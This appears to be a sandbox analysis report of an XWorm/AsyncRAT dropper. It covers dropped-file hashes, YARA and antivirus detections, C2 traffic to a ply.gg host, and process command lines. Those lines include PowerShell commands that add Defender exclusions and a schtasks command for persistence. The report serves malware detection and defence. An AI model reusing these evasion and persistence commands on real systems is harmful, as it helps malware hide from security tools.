                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 7 04:01:27 2025, mtime=Tue Jan 7 04:01:27 2025, atime=Tue Jan 7 04:01:27 2025, length=75776, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):634
                                                                                        Entropy (8bit):4.580394979814711
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:4xtQlXXMf+RcMreiXuhEtHGCF1qS4pWJ0ljAlPtvfUSD6bhEZGx2/miUymoy0nJb:8WMf+Rcm9ueUS+ccjAhfZGbNxgU1dmV
                                                                                        MD5:4B1396A1A29DE951C146ABFA0F127DA6
                                                                                        SHA1:8AC6AF8223CB23D28BA1CD83BC9132B3BA8ACF6A
                                                                                        SHA-256:A8C22C39AEF3E951EECCFC6F3BA9E2015EADC12966B200B69702E6759FEE2DDB
                                                                                        SHA-512:4E63D5C2DC36C226A2F18B0E5596BF7F8045B37A884E2280030CC021B71561B82CC137BD5CA4A68963752D309DDC9F669C31EB24E1851946ACC1DFA535D3C541
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ..fU.4.`..fU.4.`..fU.4.`...(...........................P.O. .:i.....+00.../C:\...................`.1.....'Z.(. PROGRA~3..H......O.I'Z.(....g........................P.r.o.g.r.a.m.D.a.t.a.....T.2..(..'Z.( coding..>......'Z.('Z.(.....)........................c.o.d.i.n.g.......D...............-.......C............I.6.....C:\ProgramData\coding..-.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.c.o.d.i.n.g.`.......X.......181598...........hT..CrF.f4... ..qX.....,...W..hT..CrF.f4... ..qX.....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):75776
                                                                                        Entropy (8bit):5.94947504067525
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z1fsaWa6B6zIJgfxtrjSvbqpU+CgEEL6DQrGR8mOOrxkajucVB:RfsaWajIJi6bq2lEprGiONkaju+B
                                                                                        MD5:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        SHA1:3B643A4AD443A5EF249B1C02D0CDB927F5AE38E6
                                                                                        SHA-256:6A2BDC82837DA65C36AF89091F9B1282AE735DED04985BA44759466E4F47C394
                                                                                        SHA-512:67B5AC3FDB9C771F13603D9D78461751172A71EB6B236A55A7BA9C51D96B98C79A615D13F677317189007BA24F452B1B53B31356ACB25913BCEEA6313D84D452
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\Desktop\24572628.exe, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Desktop\24572628.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................<... ...@....@.. ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................<......H........b..........&.....................................................(....*.r...p*. C~..*..(....*.ry..p*. ....*.s.........s.........s.........s.........*.r...p*. y.".*.ri..p*. ....*.r...p*. *p{.*.rY..p*. .O..*.r...p*. /?..*..((...*.r!..p*. .H..*.r{..p*. ..e.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. S...*.r?..p*.r...p*. 9/T.*.r...p*. ....*.rM..p*. E/..*.r...p*. ....*.r...p*.r[.
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6
                                                                                        Entropy (8bit):1.2516291673878228
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:i:i
                                                                                        MD5:8CE415126388942B00CCF21460675DFE
                                                                                        SHA1:7429BD9C85859C88720A23206E62FF9FA5E078ED
                                                                                        SHA-256:AF0C5ABBE62B24372BC89B5EBBECDA85F17EB51B1DAA8BB300D8336885396B29
                                                                                        SHA-512:0DF196F8BCA531389D99C5435545509260AF25619BDEE894B05B7EEC78D076703540A13C0D076DCE0F5AFF57BC1AB83675E1AA6291A6151AC1891B6ED64AF750
                                                                                        Malicious:false
                                                                                        Preview:0000..
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.978930596680155
                                                                                        TrID:
                                                                                        • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                        • Win64 Executable Console (202006/5) 47.64%
                                                                                        • Win64 Executable (generic) (12005/4) 2.83%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                        • DOS Executable Generic (2002/1) 0.47%
                                                                                        File name:YPzNsfg4nR.exe
                                                                                        File size:209'408 bytes
                                                                                        MD5:47f35ed89ba0b7756cc4d268e7516f55
                                                                                        SHA1:714b90afdccaee669f5e2edd1b8680c4631cffa0
                                                                                        SHA256:691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6
                                                                                        SHA512:248494a501923a303c540fcf6d2ce42af2ece7fc48fd236c344d7d809df0c978468067ac2cf6d8699cb5635273cce84e630ab9d5ee9d2025abc1d407915600b0
                                                                                        SSDEEP:6144:MtajSmYx6g7Fn/hZR9ICPtajSmYx6g7Fn/hZR9IC:yajPYx6g7FnXYUajPYx6g7FnXY
                                                                                        TLSH:F624F1BA84E45437C84416F64EBD6FB18AD7F44E02538CF99AB0D8F544B2764C6F7888
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....a............"...0..*............... .....@..... ....................................`...@......@............... .....
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x140000000
                                                                                        Entrypoint Section:
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xA7BF61F9 [Sat Mar 8 08:25:29 2059 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:
                                                                                        Instruction
                                                                                        dec ebp
                                                                                        pop edx
                                                                                        nop
                                                                                        add byte ptr [ebx], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax+eax], al
                                                                                        add byte ptr [eax], al
                                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x578 | .rsrc
                                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x347f0 | 0x54 | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                         .text | 0x2000 | 0x328f0 | 0x32a00 | a10b7a436dbe7a44139d74bacb67dd0b | False | 0.9693672839506173 | data | 7.988299230220677 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                         .rsrc | 0x36000 | 0x578 | 0x600 | 255a5c29385a2b32359b609451859123 | False | 0.3977864583333333 | data | 4.068795341618418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                         RT_VERSION | 0x36090 | 0x2e8 | data | | | 0.4153225806451613
                                                                                         RT_MANIFEST | 0x36388 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                         2025-01-07T06:01:39.003798+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49999 | 147.185.221.21 | 39219 | TCP
                                                                                         2025-01-07T06:02:05.111357+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 50007 | 147.185.221.21 | 39219 | TCP
                                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                         Jan 7, 2025 06:00:26.587495089 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:00:26.592451096 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:00:26.594413996 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:00:26.594882011 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:00:26.599735022 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:00:27.084784031 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:00:27.126354933 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:01:28.060178995 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:28.065088987 CET | 39219 | 49999 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:28.065182924 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:28.112932920 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:28.117738008 CET | 39219 | 49999 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:39.003798008 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:39.113607883 CET | 39219 | 49999 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:40.861277103 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:40.861371994 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:01:49.457283974 CET | 39219 | 49999 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:49.457443953 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:50.860858917 CET | 49999 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:50.865427971 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:50.865652084 CET | 39219 | 49999 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:50.870234966 CET | 39219 | 50007 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:50.870326996 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:50.910499096 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:01:50.915326118 CET | 39219 | 50007 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:05.111356974 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:05.116173983 CET | 39219 | 50007 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:07.112608910 CET | 49743 | 80 | 192.168.2.5 | 208.95.112.1
                                                                                         Jan 7, 2025 06:02:07.117444992 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:12.252716064 CET | 39219 | 50007 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:12.252789021 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:14.595351934 CET | 50007 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:14.596678972 CET | 50010 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:14.600214958 CET | 39219 | 50007 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:14.601567984 CET | 39219 | 50010 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:14.601660967 CET | 50010 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:14.668013096 CET | 50010 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:14.672894001 CET | 39219 | 50010 | 147.185.221.21 | 192.168.2.5
                                                                                         Jan 7, 2025 06:02:23.298557043 CET | 50010 | 39219 | 192.168.2.5 | 147.185.221.21
                                                                                         Jan 7, 2025 06:02:23.303500891 CET | 39219 | 50010 | 147.185.221.21 | 192.168.2.5
                                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                         Jan 7, 2025 06:00:26.559282064 CET | 52766 | 53 | 192.168.2.5 | 1.1.1.1
                                                                                         Jan 7, 2025 06:00:26.565876007 CET | 53 | 52766 | 1.1.1.1 | 192.168.2.5
                                                                                         Jan 7, 2025 06:01:28.023303986 CET | 50484 | 53 | 192.168.2.5 | 1.1.1.1
                                                                                         Jan 7, 2025 06:01:28.055989981 CET | 53 | 50484 | 1.1.1.1 | 192.168.2.5
                                                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                         Jan 7, 2025 06:00:26.559282064 CET | 192.168.2.5 | 1.1.1.1 | 0xd2cc | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                                                         Jan 7, 2025 06:01:28.023303986 CET | 192.168.2.5 | 1.1.1.1 | 0x4174 | Standard query (0) | usb-alignment.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
                                                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                         Jan 7, 2025 06:00:26.565876007 CET | 1.1.1.1 | 192.168.2.5 | 0xd2cc | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                         Jan 7, 2025 06:01:28.055989981 CET | 1.1.1.1 | 192.168.2.5 | 0x4174 | No error (0) | usb-alignment.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
                                                                                        • ip-api.com
                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         0 | 192.168.2.5 | 49743 | 208.95.112.1 | 80 | 7544 | C:\Users\user\Desktop\24572628.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Jan 7, 2025 06:00:26.594882011 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                                                             Host: ip-api.com
                                                                                             Connection: Keep-Alive
                                                                                         Jan 7, 2025 06:00:27.084784031 CET | 175 | IN | HTTP/1.1 200 OK
                                                                                             Date: Tue, 07 Jan 2025 05:00:26 GMT
                                                                                             Content-Type: text/plain; charset=utf-8
                                                                                             Content-Length: 6
                                                                                             Access-Control-Allow-Origin: *
                                                                                             X-Ttl: 60
                                                                                             X-Rl: 44
                                                                                             Data Raw: 66 61 6c 73 65 0a
                                                                                             Data Ascii: false


                                                                                        Target ID:0
                                                                                        Start time:00:00:15
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\YPzNsfg4nR.exe"
                                                                                        Imagebase:0x20868a90000
                                                                                        File size:209'408 bytes
                                                                                        MD5 hash:47F35ED89BA0B7756CC4D268E7516F55
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:00:00:15
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:00:00:20
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Users\user\Desktop\24572628.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\24572628.exe"
                                                                                        Imagebase:0x340000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\Desktop\24572628.exe, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Desktop\24572628.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:4
                                                                                        Start time:00:00:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:00:00:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:00:00:34
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:00:00:34
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:00:00:47
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:00:00:47
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:00:01:03
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:00:01:03
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:00:01:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                                                                                        Imagebase:0x7ff7b1660000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:00:01:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:00:01:28
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\ProgramData\coding
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\ProgramData\coding
                                                                                        Imagebase:0x130000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\coding, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\coding, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Has exited:true
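
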